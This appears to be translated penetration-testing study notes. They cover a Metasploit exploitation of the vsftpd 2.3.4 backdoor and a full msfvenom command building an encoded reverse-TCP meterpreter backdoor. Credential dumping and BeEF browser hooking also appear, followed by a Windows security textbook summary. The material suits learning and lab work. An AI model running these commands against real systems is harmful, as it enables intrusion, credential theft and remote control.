Retrieval and Exploitation of Vulnerabilities
searchsploit will look for vulnerability information through the local Exploit-DB. It's important to note that searchsploit uses the AND operator, and the more terms used, the more results are filtered out.
Metasploit basics of exploit
1. Start the service:
To use metasploit in kali, you need to use the command to service postgresql startstart the PostgreSQL database service first, use the command to msfconsolestart the metasploit service, and then you can fully use the msf database to query the exploit and records.
2. Path introduction
In kali, the path of msf is /usr/share/metasploit-framework.
3. Basic commands
- msfconsole: open the console of metasploit
- msfvenom: is a mix of msfpayload and msfencode. msfpayload is used to generate payload or shellcode, msfencode is the encoder in msf
4. Test Example
Start by nmap -sVscanning the target host and the version of the software running on the port. The result shows that the target host is running an ftp server, and the version is vsftpd 2.3.4(this version of vsftpd has a vulnerability, an attacker can remotely obtain the root privileges of the target host).
Below we use metasploit to carry out the attack. Enter msfconsole on the command line to open the console of metasploit, and then enter search vsftpdto search for modules that match vsftpd.
exploit/unix/ftp/vsftpd_234_backdoorThe target is exactly the scanned version 2.3.4, and then this module can be used to attack the target. Enter use exploit/unix/ftp/vsftpd_234_backdoor, and the prompt prompts to enter the path to show optionsview the related items that need to be set. Prompt to set RHOST and RPORT (the default port is 21), set RHOST 192.168.199.139set the target IP.
Next, select the payload, enter the command set payload, press the Tab key to automatically complete the attack payload cmd/unix/interact, and show optionsview the related items that need to be set. After the setting is complete, enter exploit to implement the attack.
The result is returned to the shell of the target host, and the root authority of the target host is obtained. You can enter commands to view the id, network configuration, etc., and the attack can be successfully implemented.
Meter Preter
Meterpreter is an extension module in the metasploit framework. It is used as an attack payload after a successful overflow. The attack payload returns a control channel after a successful overflow attack. Using it as an attack payload can get a link to a meterpretershell of the target system.
1. Generate meterpreter backdoor
Selected attack payload windows/meterpreter/reverse_tcp(for windows, reverse connection shell), use msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.161 LPORT=2333 -e x86/shikata_ga_nai -i 5 -f exe -o /root/backdoor.exeto generate backdoor.
2. Monitoring settings
The generated backdoor needs to have corresponding monitoring. Open the metasploit console and configure a bounce session handler:
3.meterpreter shell
When the target machine successfully executes backdoor.exe, we get a meterpreter shell. Enter background to return to msf. If you want to return to the meterpreter shell, enter sessions to view the ID, and enter sessions -i IDto select the session you want to return.
Enter help in the meterpreter shell to view executable commands, such as sysinfo to display the target system information, hashdump to grab the hash, pwd to display the current path, etc.
There are also some extension tools for meterpreter, use the load + tab key to view these tools, and then select the required tool to use (load mimikatz is used to grab the system plaintext).
BeEF
XSS vulnerabilities often require a strong framework support, such as the XSS platform on the Internet. Under KALI, BeEf is a tool that is not inferior to the XSS platform. BeEf is the abbreviation of Browser Attack Framework. It is a penetration testing tool focused on browsers. It expands the exploitation of cross-site vulnerabilities, can hook many browsers and can execute many embedded commands.
Enter beef-xss on the command line, and the browser automatically accesses the page . The http://127.0.0.1:3000/ui/authenticationdefault user name and password are beef. After logging in, you will enter the main interface.
We assume that the host under test requests a page due to an XSS vulnerability http://127.0.0.1:3000/demod/basic.html. This is a test page. If the page is added to the page request through XSS, that is to say, everyone who visits a certain page will visit the page, and the visitor will Hooked by BeEF, that is, added to Online Browsers.
In this way, you can see an online host at the left end of the main interface. A series of information is displayed in the Current Browser tab on the right.
The duration of HOOK is until the test page is closed. During this period, it is equivalent to being controlled and can send attack commands.
We take the Raw JavaScript module under MISC as an example to test, enter the Javascript code on the right end to the target pop-up window, and click Execute to attack.
If successful, a pop-up window will prompt:
The Command results are now displayed result=It worked!.
The Proxy function of BeEF is introduced below. Select the target host, right-click, and select use as Proxy in the menu.
Edit and send what you want to send in Forge Request in the Rider tab, here we keep the default.
Click send, and the information about the executed request will be displayed in the History tab.
After the execution is complete (Processed shows complete), click the entry to view the details of the package. With this, the target can be made to visit a specific page, and if a specific page has a vulnerability, it will be attacked.
The above is the process of relying on the target to be a proxy and then requesting a specific page. BeEF can also cooperate with Metasploit to further penetrate the host. BeEF does not load Metasploit by default. If you want to use Metasploit's rich attack modules, you need to do the following configuration.
First enter the directory /usr/share/beef-xss/, modify the config.yaml file, and set metasploit to true.
Then enter the directory /usr/share/beef-xss/extensions/metasploit, modify the config.yaml file, set the host and callback_host to the local IP address, and then modify the Custom path.
After the setting is complete, open msfconsole and enter the command load msgrpc ServerHost=192.168.199.162 Pass=abc123.
At this point, enter the directory /usr/share/beef-xss/and execute the ./beef -x command to reload the metasploit module.
service beef-xss startCommand to restart the service, and then log in to BeEF again. There are many modules that can be used under metasploit. Now you can use the modules of metasploit to attack.
Textbook summary
1. Basic framework of Windows operating system
1. The basic structure of windows is divided into the operating system kernel running in the privileged mode of the processor and the user running in the unprivileged mode of the processor, namely kernel mode and user mode.
2. Kernel mode: windows executive body, windows kernel body, device driver, hardware abstraction layer, windows window and graphical interface interface.
3. User mode: system support process, environment subsystem service process, service process, user application software, core subsystem DLL.
4. Core mechanism: process and thread management mechanism, memory management mechanism, file management mechanism, registry management mechanism, network management mechanism.
5. Network management mechanism: network card hardware driver (physical layer), NDIS library and miniport driver (link layer), TDI transport layer (network protocol driver) (network layer and transport layer), network APID and TDI client ( session layer and presentation layer), network applications and service processes (application layer).
2. Security Architecture and Mechanism
1. Monitor model: The access from the subject to the object is mediated by the monitor, and the reference monitor conducts authorized access according to the security access control policy, and all access records are generated by the monitor to generate audit logs.
2. Core: SRM security reference monitor (in the kernel), LSASS security service (user mode), winlogon/netlogn, and Eventlog
3. Identity authentication mechanism:
Security principals: user, user group, computer
Authentication: local authentication (winlogon process, GINA graphical login window and LSASS service), network authentication (NTLM, Lanman, kerberos)
4. Authorization and access control mechanism:
Objects: files, directories, registry keys, kernel objects, synchronization objects, private objects, pipes, memory, communication interfaces.
Attribute composition: Owner SID, Group SID, DACL autonomous access control list, SACL system audit access control list.
5. Security Audit Mechanism
6. Other security mechanisms: Security Center (firewall, automatic patch update, virus protection), IPsec loading and verification mechanism, EPS encrypted file system, windows file protection mechanism, privacy protection and browser security protection provided by the bundled IE browser mechanism.
3. Remote security attack and defense technology
1. Including remote password guessing attack, windows network service attack, windows client and user attack.
2. Life cycle:
- Windows Security Vulnerability Discovery, Exploitation and Patching Process
- Security Vulnerability Public Disclosure Repository: CVE, NVD, SecyrityFocus, OSVDB
- Target-specific penetration testing attack process: vulnerability scanning testing, finding penetration code for discovered vulnerabilities, conducting penetration testing
- Penetration testing with metasploit software: user interface (CLI, Console, web, GUI)
3. Remote password guessing attack:
- Remote password guessing: SMB protocol (tcp445, tcp139), others include WMI service, TS remote desktop terminal service, MY SQL database service, SharePoint. Tools include: Legion, enum, smbgrind, NTScan, XScan, streamer
- Eavesdropping and Cracking of Remote Password Exchange Communications: Weaknesses of NTLM, Lanman, NTLMV2, and Kerberos Network Authentication Protocols.
- Prevention of remote password guessing: Turn off unnecessary vulnerable network services, configure host firewalls to restrict certain port services, network firewalls restrict access to these services, disable outdated and flawed Lanman and NTLM, specify strong passwords Strategy.
4. Network service remote penetration attacks: famous vulnerabilities and attacks on NETBIOS services, well-known vulnerabilities and attacks on SMB services, well-known vulnerabilities and attacks on MSRPC services, remote penetration attacks on Microsoft networks on Windows systems, on Windows systems Remote penetration attacks of third-party services.
Preventive measures: The most basic thing is to try to avoid and eliminate the security vulnerabilities of the service software that these penetration attacks rely on.
4. Local security attack and defense technology
1. Local privilege escalation attack: Exploiting security flaws and vulnerabilities in the operating system kernel and privileged user startup programs, because the server and desktop systems are not patched immediately.
2. Theft of sensitive information:
- Windows system password ciphertext extraction technology (copy password ciphertext file, rdisk tool backup, pwdumpx extract password ciphertext from SAM file or active directory)
- Windows system password cracking technology (L0phtCrack, John the Ripper, Cain)
- User sensitive data theft: find, findstr, grep, meterpreter
- Local sensitive information theft prevention: choose high-strength, high-defense passwords, use more secure encrypted plaintext algorithms, and configure policies securely.
Five, windows eliminate traces
1. Eliminate traces, turn off the audit function, and clean up the event log.
Preventive measures: Set up system auditing and network service auditing in advance, and log records on non-erasable CDROM.
2. Remote control and backdoor program
- Remote control: command line remote control tools (Netcat, psexec, meterpreter), graphical remote control tools (VNC, RemoteAdmin, PCanyware)
- Backdoor programs: foreign (BO, BO2K), domestic (Glacier, Grey Pigeon, Guangzhou Foreign Girls, PCshare, Disk Drive, Robot Dog, etc.)
- Preventive measures: backdoor detection software, anti-software, rootkitrerealer, IcSword.